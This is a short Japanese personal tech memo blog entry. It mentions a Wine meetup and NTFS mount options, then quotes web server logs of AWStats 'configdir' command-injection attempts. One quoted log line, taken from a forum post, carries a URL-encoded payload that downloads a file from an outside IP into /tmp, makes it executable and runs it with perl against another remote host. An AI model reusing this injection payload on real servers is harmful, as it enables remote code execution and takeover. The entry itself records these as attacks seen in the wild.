僕の備忘録(PC、UN*X、ネットワーク関連が中心)なんです。
自分の書いたところは適当(な時とか)に書き換えますので御了承を。
大阪駅へ歩き、ことらぐのお茶会に参加。WineのHackerを囲んで WineやCodewaversの話題が咲き乱れていた。 回転寿司にスタバ。おまけにおでんをつまんで 乾杯。NTFSをmountするオプションに uid=NUM,gid=NUMがある 話を聞く。JMANに明記されていたことを後付けで知った。
変なログ。これは勘違いや嫌がらせではなかろう。
201.8.98.44 - - [12/Feb/2005:02:00:49 +0900] \ "GET /awstats/awstats.pl?configdir=|echo;%20echo;%20ls;%20echo;%20echo| \ HTTP/1.0" 404 472 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
まあ、此 に比べればまだ手ぬるいかも。
221 :212:05/02/05 01:26:39 ID:xJZHVJAK
スレ違いだけど、こんな感じでやられました。
"GET /cgi-bin/awstats.pl?configdir
=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%2066%2e90%2e116%
2e37%2fdc%2eexe%3bmv%20dc%2eexe%20love%2epl%3bchmod%20777%20love%
2epl%3bperl%20%2e%2flove%2epl%2069%2e158%2e57%2e20%2020001%3bid%
3buptime% 3becho%20e_exp%3b%2500 HTTP/1.1" 200 8 07 "-" "-"
222 :login:Penguin:05/02/05 02:00:34 ID:XQoynZ2n
>>221
AWStatsの脆弱性を突かれましたな。
アクセス解析ツールにバグ、人気Blogが改ざんの被害に
http://www.itmedia.co.jp/enter
リンクはご自由にどうぞ。でもURLや内容が変った場合はあしからず。